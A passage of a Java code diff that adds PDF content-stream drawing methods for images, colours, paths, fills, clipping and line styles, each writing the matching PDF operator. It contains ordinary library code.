writeAffineTransform(matrix.createAffineTransform());", - "+ writeOperator(\"Tm\");", - "+ }", - "+", - "+ /**", - "+ * Draw an image at the x,y coordinates, with the default size of the image.", - "+ *", - "+ * @param image The image to draw.", - "+ * @param x The x-coordinate to draw the image.", - "+ * @param y The y-coordinate to draw the image.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ public void drawImage(PDImageXObject image, float x, float y) throws IOException", - "+ {", - "+ drawImage(image, x, y, image.getWidth(), image.getHeight());", - "+ }", - "+", - "+ /**", - "+ * Draw an image at the x,y coordinates, with the given size.", - "+ *", - "+ * @param image The image to draw.", - "+ * @param x The x-coordinate to draw the image.", - "+ * @param y The y-coordinate to draw the image.", - "+ * @param width The width to draw the image.", - "+ * @param height The height to draw the image.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void drawImage(PDImageXObject image, float x, float y, float width, float height) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: drawImage is not allowed within a text block.\");", - "+ }", - "+", - "+ saveGraphicsState();", - "+", - "+ AffineTransform transform = new AffineTransform(width, 0, 0, height, x, y);", - "+ transform(new Matrix(transform));", - "+", - "+ writeOperand(resources.add(image));", - "+ writeOperator(\"Do\");", - "+", - "+ restoreGraphicsState();", - "+ }", - "+", - "+ /**", - "+ * Draw an image at the origin with the given transformation matrix.", - "+ *", - "+ * @param image The image to draw.", - "+ * @param matrix The transformation matrix to apply to the image.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void drawImage(PDImageXObject image, Matrix matrix) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: drawImage is not allowed within a text block.\");", - "+ }", - "+", - "+ saveGraphicsState();", - "+", - "+ AffineTransform transform = matrix.createAffineTransform();", - "+ transform(new Matrix(transform));", - "+", - "+ writeOperand(resources.add(image));", - "+ writeOperator(\"Do\");", - "+", - "+ restoreGraphicsState();", - "+ }", - "+", - "+ /**", - "+ * Draw an inline image at the x,y coordinates, with the default size of the image.", - "+ *", - "+ * @param inlineImage The inline image to draw.", - "+ * @param x The x-coordinate to draw the inline image.", - "+ * @param y The y-coordinate to draw the inline image.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ public void drawImage(PDInlineImage inlineImage, float x, float y) throws IOException", - "+ {", - "+ drawImage(inlineImage, x, y, inlineImage.getWidth(), inlineImage.getHeight());", - "+ }", - "+", - "+ /**", - "+ * Draw an inline image at the x,y coordinates and a certain width and height.", - "+ *", - "+ * @param inlineImage The inline image to draw.", - "+ * @param x The x-coordinate to draw the inline image.", - "+ * @param y The y-coordinate to draw the inline image.", - "+ * @param width The width of the inline image to draw.", - "+ * @param height The height of the inline image to draw.", - "+ *", - "+ * @throws IOException If there is an error writing to the stream.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void drawImage(PDInlineImage inlineImage, float x, float y, float width, float height) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: drawImage is not allowed within a text block.\");", - "+ }", - "+", - "+ saveGraphicsState();", - "+ transform(new Matrix(width, 0, 0, height, x, y));", - "+", - "+ // create the image dictionary", - "+ StringBuilder sb = new StringBuilder();", - "+ sb.append(\"BI\");", - "+", - "+ sb.append(\"\\n /W \");", - "+ sb.append(inlineImage.getWidth());", - "+", - "+ sb.append(\"\\n /H \");", - "+ sb.append(inlineImage.getHeight());", - "+", - "+ sb.append(\"\\n /CS \");", - "+ sb.append(\"/\");", - "+ sb.append(inlineImage.getColorSpace().getName());", - "+", - "+ if (inlineImage.getDecode() != null && inlineImage.getDecode().size() > 0)", - "+ {", - "+ sb.append(\"\\n /D \");", - "+ sb.append(\"[\");", - "+ for (COSBase base : inlineImage.getDecode())", - "+ {", - "+ sb.append(((COSNumber) base).intValue());", - "+ sb.append(\" \");", - "+ }", - "+ sb.append(\"]\");", - "+ }", - "+", - "+ if (inlineImage.isStencil())", - "+ {", - "+ sb.append(\"\\n /IM true\");", - "+ }", - "+", - "+ sb.append(\"\\n /BPC \");", - "+ sb.append(inlineImage.getBitsPerComponent());", - "+", - "+ // image dictionary", - "+ write(sb.toString());", - "+ writeLine();", - "+", - "+ // binary data", - "+ writeOperator(\"ID\");", - "+ writeBytes(inlineImage.getData());", - "+ writeLine();", - "+ writeOperator(\"EI\");", - "+", - "+ restoreGraphicsState();", - "+ }", - "+", - "+ /**", - "+ * Draws the given Form XObject at the current location.", - "+ *", - "+ * @param form Form XObject", - "+ * @throws IOException if the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void drawForm(PDFormXObject form) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: drawForm is not allowed within a text block.\");", - "+ }", - "+", - "+ writeOperand(resources.add(form));", - "+ writeOperator(\"Do\");", - "+ }", - "+", - "+ /**", - "+ * The cm operator. Concatenates the given matrix with the CTM.", - "+ *", - "+ * @param matrix the transformation matrix", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ public void transform(Matrix matrix) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: Modifying the current transformation matrix is not allowed within text objects.\");", - "+ }", - "+", - "+ writeAffineTransform(matrix.createAffineTransform());", - "+ writeOperator(\"cm\");", - "+ }", - "+", - "+ /**", - "+ * q operator. Saves the current graphics state.", - "+ * @throws IOException If an error occurs while writing to the stream.", - "+ */", - "+ public void saveGraphicsState() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: Saving the graphics state is not allowed within text objects.\");", - "+ }", - "+", - "+ if (!fontStack.isEmpty())", - "+ {", - "+ fontStack.push(fontStack.peek());", - "+ }", - "+ if (!strokingColorSpaceStack.isEmpty())", - "+ {", - "+ strokingColorSpaceStack.push(strokingColorSpaceStack.peek());", - "+ }", - "+ if (!nonStrokingColorSpaceStack.isEmpty())", - "+ {", - "+ nonStrokingColorSpaceStack.push(nonStrokingColorSpaceStack.peek());", - "+ }", - "+ writeOperator(\"q\");", - "+ }", - "+", - "+ /**", - "+ * Q operator. Restores the current graphics state.", - "+ * @throws IOException If an error occurs while writing to the stream.", - "+ */", - "+ public void restoreGraphicsState() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: Restoring the graphics state is not allowed within text objects.\");", - "+ }", - "+", - "+ if (!fontStack.isEmpty())", - "+ {", - "+ fontStack.pop();", - "+ }", - "+ if (!strokingColorSpaceStack.isEmpty())", - "+ {", - "+ strokingColorSpaceStack.pop();", - "+ }", - "+ if (!nonStrokingColorSpaceStack.isEmpty())", - "+ {", - "+ nonStrokingColorSpaceStack.pop();", - "+ }", - "+ writeOperator(\"Q\");", - "+ }", - "+", - "+ protected COSName getName(PDColorSpace colorSpace)", - "+ {", - "+ if (colorSpace instanceof PDDeviceGray ||", - "+ colorSpace instanceof PDDeviceRGB ||", - "+ colorSpace instanceof PDDeviceCMYK)", - "+ {", - "+ return COSName.getPDFName(colorSpace.getName());", - "+ }", - "+ else", - "+ {", - "+ return resources.add(colorSpace);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Sets the stroking color and, if necessary, the stroking color space.", - "+ *", - "+ * @param color Color in a specific color space.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ */", - "+ public void setStrokingColor(PDColor color) throws IOException", - "+ {", - "+ if (strokingColorSpaceStack.isEmpty() ||", - "+ strokingColorSpaceStack.peek() != color.getColorSpace())", - "+ {", - "+ writeOperand(getName(color.getColorSpace()));", - "+ writeOperator(\"CS\");", - "+ setStrokingColorSpaceStack(color.getColorSpace());", - "+ }", - "+", - "+ for (float value : color.getComponents())", - "+ {", - "+ writeOperand(value);", - "+ }", - "+", - "+ if (color.getColorSpace() instanceof PDPattern)", - "+ {", - "+ writeOperand(color.getPatternName());", - "+ }", - "+", - "+ if (color.getColorSpace() instanceof PDPattern ||", - "+ color.getColorSpace() instanceof PDSeparation ||", - "+ color.getColorSpace() instanceof PDDeviceN ||", - "+ color.getColorSpace() instanceof PDICCBased)", - "+ {", - "+ writeOperator(\"SCN\");", - "+ }", - "+ else", - "+ {", - "+ writeOperator(\"SC\");", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Set the stroking color using an AWT color. Conversion uses the default sRGB color space.", - "+ *", - "+ * @param color The color to set.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ */", - "+ public void setStrokingColor(Color color) throws IOException", - "+ {", - "+ float[] components = new float[] {", - "+ color.getRed() / 255f, color.getGreen() / 255f, color.getBlue() / 255f };", - "+ PDColor pdColor = new PDColor(components, PDDeviceRGB.INSTANCE);", - "+ setStrokingColor(pdColor);", - "+ }", - "+", - "+ /**", - "+ * Set the stroking color in the DeviceRGB color space. Range is 0..255.", - "+ *", - "+ * @param r The red value", - "+ * @param g The green value.", - "+ * @param b The blue value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameters are invalid.", - "+ */", - "+ public void setStrokingColor(int r, int g, int b) throws IOException", - "+ {", - "+ if (isOutside255Interval(r) || isOutside255Interval(g) || isOutside255Interval(b))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameters must be within 0..255, but are \"", - "+ + String.format(\"(%d,%d,%d)\", r, g, b));", - "+ }", - "+ writeOperand(r / 255f);", - "+ writeOperand(g / 255f);", - "+ writeOperand(b / 255f);", - "+ writeOperator(\"RG\");", - "+ setStrokingColorSpaceStack(PDDeviceRGB.INSTANCE);", - "+ }", - "+", - "+ /**", - "+ * Set the stroking color in the DeviceCMYK color space. Range is 0..1", - "+ *", - "+ * @param c The cyan value.", - "+ * @param m The magenta value.", - "+ * @param y The yellow value.", - "+ * @param k The black value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameters are invalid.", - "+ */", - "+ public void setStrokingColor(float c, float m, float y, float k) throws IOException", - "+ {", - "+ if (isOutsideOneInterval(c) || isOutsideOneInterval(m) || isOutsideOneInterval(y) || isOutsideOneInterval(k))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameters must be within 0..1, but are \"", - "+ + String.format(\"(%.2f,%.2f,%.2f,%.2f)\", c, m, y, k));", - "+ }", - "+ writeOperand(c);", - "+ writeOperand(m);", - "+ writeOperand(y);", - "+ writeOperand(k);", - "+ writeOperator(\"K\");", - "+ setStrokingColorSpaceStack(PDDeviceCMYK.INSTANCE);", - "+ }", - "+", - "+ /**", - "+ * Set the stroking color in the DeviceGray color space. Range is 0..1.", - "+ *", - "+ * @param g The gray value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameter is invalid.", - "+ */", - "+ public void setStrokingColor(float g) throws IOException", - "+ {", - "+ if (isOutsideOneInterval(g))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameter must be within 0..1, but is \" + g);", - "+ }", - "+ writeOperand(g);", - "+ writeOperator(\"G\");", - "+ setStrokingColorSpaceStack(PDDeviceGray.INSTANCE);", - "+ }", - "+", - "+ /**", - "+ * Sets the non-stroking color and, if necessary, the non-stroking color space.", - "+ *", - "+ * @param color Color in a specific color space.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ */", - "+ public void setNonStrokingColor(PDColor color) throws IOException", - "+ {", - "+ if (nonStrokingColorSpaceStack.isEmpty() ||", - "+ nonStrokingColorSpaceStack.peek() != color.getColorSpace())", - "+ {", - "+ writeOperand(getName(color.getColorSpace()));", - "+ writeOperator(\"cs\");", - "+ setNonStrokingColorSpaceStack(color.getColorSpace());", - "+ }", - "+", - "+ for (float value : color.getComponents())", - "+ {", - "+ writeOperand(value);", - "+ }", - "+", - "+ if (color.getColorSpace() instanceof PDPattern)", - "+ {", - "+ writeOperand(color.getPatternName());", - "+ }", - "+", - "+ if (color.getColorSpace() instanceof PDPattern ||", - "+ color.getColorSpace() instanceof PDSeparation ||", - "+ color.getColorSpace() instanceof PDDeviceN ||", - "+ color.getColorSpace() instanceof PDICCBased)", - "+ {", - "+ writeOperator(\"scn\");", - "+ }", - "+ else", - "+ {", - "+ writeOperator(\"sc\");", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Set the non-stroking color using an AWT color. Conversion uses the default sRGB color space.", - "+ *", - "+ * @param color The color to set.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ */", - "+ public void setNonStrokingColor(Color color) throws IOException", - "+ {", - "+ float[] components = new float[] {", - "+ color.getRed() / 255f, color.getGreen() / 255f, color.getBlue() / 255f };", - "+ PDColor pdColor = new PDColor(components, PDDeviceRGB.INSTANCE);", - "+ setNonStrokingColor(pdColor);", - "+ }", - "+", - "+ /**", - "+ * Set the non-stroking color in the DeviceRGB color space. Range is 0..255.", - "+ *", - "+ * @param r The red value.", - "+ * @param g The green value.", - "+ * @param b The blue value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameters are invalid.", - "+ */", - "+ public void setNonStrokingColor(int r, int g, int b) throws IOException", - "+ {", - "+ if (isOutside255Interval(r) || isOutside255Interval(g) || isOutside255Interval(b))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameters must be within 0..255, but are \"", - "+ + String.format(\"(%d,%d,%d)\", r, g, b));", - "+ }", - "+ writeOperand(r / 255f);", - "+ writeOperand(g / 255f);", - "+ writeOperand(b / 255f);", - "+ writeOperator(\"rg\");", - "+ setNonStrokingColorSpaceStack(PDDeviceRGB.INSTANCE);", - "+ }", - "+", - "+ /**", - "+ * Set the non-stroking color in the DeviceCMYK color space. Range is 0..255.", - "+ *", - "+ * @param c The cyan value.", - "+ * @param m The magenta value.", - "+ * @param y The yellow value.", - "+ * @param k The black value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameters are invalid.", - "+ */", - "+ public void setNonStrokingColor(int c, int m, int y, int k) throws IOException", - "+ {", - "+ if (isOutside255Interval(c) || isOutside255Interval(m) || isOutside255Interval(y) || isOutside255Interval(k))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameters must be within 0..255, but are \"", - "+ + String.format(\"(%d,%d,%d,%d)\", c, m, y, k));", - "+ }", - "+ setNonStrokingColor(c / 255f, m / 255f, y / 255f, k / 255f);", - "+ }", - "+", - "+ /**", - "+ * Set the non-stroking color in the DeviceCMYK color space. Range is 0..1.", - "+ *", - "+ * @param c The cyan value.", - "+ * @param m The magenta value.", - "+ * @param y The yellow value.", - "+ * @param k The black value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ */", - "+ public void setNonStrokingColor(float c, float m, float y, float k) throws IOException", - "+ {", - "+ if (isOutsideOneInterval(c) || isOutsideOneInterval(m) || isOutsideOneInterval(y) || isOutsideOneInterval(k))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameters must be within 0..1, but are \"", - "+ + String.format(\"(%.2f,%.2f,%.2f,%.2f)\", c, m, y, k));", - "+ }", - "+ writeOperand(c);", - "+ writeOperand(m);", - "+ writeOperand(y);", - "+ writeOperand(k);", - "+ writeOperator(\"k\");", - "+ setNonStrokingColorSpaceStack(PDDeviceCMYK.INSTANCE);", - "+ }", - "+", - "+ /**", - "+ * Set the non-stroking color in the DeviceGray color space. Range is 0..255.", - "+ *", - "+ * @param g The gray value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameter is invalid.", - "+ */", - "+ public void setNonStrokingColor(int g) throws IOException", - "+ {", - "+ if (isOutside255Interval(g))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameter must be within 0..255, but is \" + g);", - "+ }", - "+ setNonStrokingColor(g / 255f);", - "+ }", - "+", - "+ /**", - "+ * Set the non-stroking color in the DeviceGray color space. Range is 0..1.", - "+ *", - "+ * @param g The gray value.", - "+ * @throws IOException If an IO error occurs while writing to the stream.", - "+ * @throws IllegalArgumentException If the parameter is invalid.", - "+ */", - "+ public void setNonStrokingColor(float g) throws IOException", - "+ {", - "+ if (isOutsideOneInterval(g))", - "+ {", - "+ throw new IllegalArgumentException(\"Parameter must be within 0..1, but is \" + g);", - "+ }", - "+ writeOperand(g);", - "+ writeOperator(\"g\");", - "+ setNonStrokingColorSpaceStack(PDDeviceGray.INSTANCE);", - "+ }", - "+", - "+ /**", - "+ * Add a rectangle to the current path.", - "+ *", - "+ * @param x The lower left x coordinate.", - "+ * @param y The lower left y coordinate.", - "+ * @param width The width of the rectangle.", - "+ * @param height The height of the rectangle.", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void addRect(float x, float y, float width, float height) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: addRect is not allowed within a text block.\");", - "+ }", - "+ writeOperand(x);", - "+ writeOperand(y);", - "+ writeOperand(width);", - "+ writeOperand(height);", - "+ writeOperator(\"re\");", - "+ }", - "+", - "+ /**", - "+ * Append a cubic B\u00c3\u00a9zier curve to the current path. The curve extends from the current point to", - "+ * the point (x3, y3), using (x1, y1) and (x2, y2) as the B\u00c3\u00a9zier control points.", - "+ *", - "+ * @param x1 x coordinate of the point 1", - "+ * @param y1 y coordinate of the point 1", - "+ * @param x2 x coordinate of the point 2", - "+ * @param y2 y coordinate of the point 2", - "+ * @param x3 x coordinate of the point 3", - "+ * @param y3 y coordinate of the point 3", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void curveTo(float x1, float y1, float x2, float y2, float x3, float y3) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: curveTo is not allowed within a text block.\");", - "+ }", - "+ writeOperand(x1);", - "+ writeOperand(y1);", - "+ writeOperand(x2);", - "+ writeOperand(y2);", - "+ writeOperand(x3);", - "+ writeOperand(y3);", - "+ writeOperator(\"c\");", - "+ }", - "+", - "+ /**", - "+ * Append a cubic B\u00c3\u00a9zier curve to the current path. The curve extends from the current point to", - "+ * the point (x3, y3), using the current point and (x2, y2) as the B\u00c3\u00a9zier control points.", - "+ *", - "+ * @param x2 x coordinate of the point 2", - "+ * @param y2 y coordinate of the point 2", - "+ * @param x3 x coordinate of the point 3", - "+ * @param y3 y coordinate of the point 3", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void curveTo2(float x2, float y2, float x3, float y3) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: curveTo2 is not allowed within a text block.\");", - "+ }", - "+ writeOperand(x2);", - "+ writeOperand(y2);", - "+ writeOperand(x3);", - "+ writeOperand(y3);", - "+ writeOperator(\"v\");", - "+ }", - "+", - "+ /**", - "+ * Append a cubic B\u00c3\u00a9zier curve to the current path. The curve extends from the current point to", - "+ * the point (x3, y3), using (x1, y1) and (x3, y3) as the B\u00c3\u00a9zier control points.", - "+ *", - "+ * @param x1 x coordinate of the point 1", - "+ * @param y1 y coordinate of the point 1", - "+ * @param x3 x coordinate of the point 3", - "+ * @param y3 y coordinate of the point 3", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void curveTo1(float x1, float y1, float x3, float y3) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: curveTo1 is not allowed within a text block.\");", - "+ }", - "+ writeOperand(x1);", - "+ writeOperand(y1);", - "+ writeOperand(x3);", - "+ writeOperand(y3);", - "+ writeOperator(\"y\");", - "+ }", - "+", - "+ /**", - "+ * Move the current position to the given coordinates.", - "+ *", - "+ * @param x The x coordinate.", - "+ * @param y The y coordinate.", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void moveTo(float x, float y) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: moveTo is not allowed within a text block.\");", - "+ }", - "+ writeOperand(x);", - "+ writeOperand(y);", - "+ writeOperator(\"m\");", - "+ }", - "+", - "+ /**", - "+ * Draw a line from the current position to the given coordinates.", - "+ *", - "+ * @param x The x coordinate.", - "+ * @param y The y coordinate.", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void lineTo(float x, float y) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: lineTo is not allowed within a text block.\");", - "+ }", - "+ writeOperand(x);", - "+ writeOperand(y);", - "+ writeOperator(\"l\");", - "+ }", - "+", - "+ /**", - "+ * Stroke the path.", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void stroke() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: stroke is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"S\");", - "+ }", - "+", - "+ /**", - "+ * Close and stroke the path.", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void closeAndStroke() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: closeAndStroke is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"s\");", - "+ }", - "+", - "+ /**", - "+ * Fills the path using the nonzero winding number rule.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void fill() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: fill is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"f\");", - "+ }", - "+", - "+ /**", - "+ * Fills the path using the even-odd winding rule.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void fillEvenOdd() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: fillEvenOdd is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"f*\");", - "+ }", - "+", - "+ /**", - "+ * Fill and then stroke the path, using the nonzero winding number rule to determine the region", - "+ * to fill. This shall produce the same result as constructing two identical path objects,", - "+ * painting the first with {@link #fill() } and the second with {@link #stroke() }.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void fillAndStroke() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: fillAndStroke is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"B\");", - "+ }", - "+", - "+ /**", - "+ * Fill and then stroke the path, using the even-odd rule to determine the region to", - "+ * fill. This shall produce the same result as constructing two identical path objects, painting", - "+ * the first with {@link #fillEvenOdd() } and the second with {@link #stroke() }.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void fillAndStrokeEvenOdd() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: fillAndStrokeEvenOdd is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"B*\");", - "+ }", - "+", - "+ /**", - "+ * Close, fill, and then stroke the path, using the nonzero winding number rule to determine the", - "+ * region to fill. This shall have the same effect as the sequence {@link #closePath() }", - "+ * and then {@link #fillAndStroke() }.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void closeAndFillAndStroke() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: closeAndFillAndStroke is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"b\");", - "+ }", - "+", - "+ /**", - "+ * Close, fill, and then stroke the path, using the even-odd rule to determine the region to", - "+ * fill. This shall have the same effect as the sequence {@link #closePath() }", - "+ * and then {@link #fillAndStrokeEvenOdd() }.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void closeAndFillAndStrokeEvenOdd() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: closeAndFillAndStrokeEvenOdd is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"b*\");", - "+ }", - "+", - "+ /**", - "+ * Fills the clipping area with the given shading.", - "+ *", - "+ * @param shading Shading resource", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void shadingFill(PDShading shading) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: shadingFill is not allowed within a text block.\");", - "+ }", - "+", - "+ writeOperand(resources.add(shading));", - "+ writeOperator(\"sh\");", - "+ }", - "+", - "+ /**", - "+ * Closes the current subpath.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void closePath() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: closePath is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"h\");", - "+ }", - "+", - "+ /**", - "+ * Intersects the current clipping path with the current path, using the nonzero rule.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void clip() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: clip is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"W\");", - "+ ", - "+ // end path without filling or stroking", - "+ writeOperator(\"n\");", - "+ }", - "+", - "+ /**", - "+ * Intersects the current clipping path with the current path, using the even-odd rule.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void clipEvenOdd() throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: clipEvenOdd is not allowed within a text block.\");", - "+ }", - "+ writeOperator(\"W*\");", - "+ ", - "+ // end path without filling or stroking", - "+ writeOperator(\"n\");", - "+ }", - "+", - "+ /**", - "+ * Set line width to the given value.", - "+ *", - "+ * @param lineWidth The width which is used for drawing.", - "+ * @throws IOException If the content stream could not be written", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void setLineWidth(float lineWidth) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: setLineWidth is not allowed within a text block.\");", - "+ }", - "+ writeOperand(lineWidth);", - "+ writeOperator(\"w\");", - "+ }", - "+", - "+ /**", - "+ * Set the line join style.", - "+ *", - "+ * @param lineJoinStyle 0 for miter join, 1 for round join, and 2 for bevel join.", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ * @throws IllegalArgumentException If the parameter is not a valid line join style.", - "+ */", - "+ public void setLineJoinStyle(int lineJoinStyle) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: setLineJoinStyle is not allowed within a text block.\");", - "+ }", - "+ if (lineJoinStyle >= 0 && lineJoinStyle <= 2)", - "+ {", - "+ writeOperand(lineJoinStyle);", - "+ writeOperator(\"j\");", - "+ }", - "+ else", - "+ {", - "+ throw new IllegalArgumentException(\"Error: unknown value for line join style\");", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Set the line cap style.", - "+ *", - "+ * @param lineCapStyle 0 for butt cap, 1 for round cap, and 2 for projecting square cap.", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ * @throws IllegalArgumentException If the parameter is not a valid line cap style.", - "+ */", - "+ public void setLineCapStyle(int lineCapStyle) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: setLineCapStyle is not allowed within a text block.\");", - "+ }", - "+ if (lineCapStyle >= 0 && lineCapStyle <= 2)", - "+ {", - "+ writeOperand(lineCapStyle);", - "+ writeOperator(\"J\");", - "+ }", - "+ else", - "+ {", - "+ throw new IllegalArgumentException(\"Error: unknown value for line cap style\");", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Set the line dash pattern.", - "+ *", - "+ * @param pattern The pattern array", - "+ * @param phase The phase of the pattern", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalStateException If the method was called within a text block.", - "+ */", - "+ public void setLineDashPattern(float[] pattern, float phase) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: setLineDashPattern is not allowed within a text block.\");", - "+ }", - "+ write(\"[\");", - "+ for (float value : pattern)", - "+ {", - "+ writeOperand(value);", - "+ }", - "+ write(\"] \");", - "+ writeOperand(phase);", - "+ writeOperator(\"d\");", - "+ }", - "+", - "+ /**", - "+ * Set the miter limit.", - "+ *", - "+ * @param miterLimit the new miter limit.", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void setMiterLimit(float miterLimit) throws IOException", - "+ {", - "+ if (inTextMode)", - "+ {", - "+ throw new IllegalStateException(\"Error: setMiterLimit is not allowed within a text 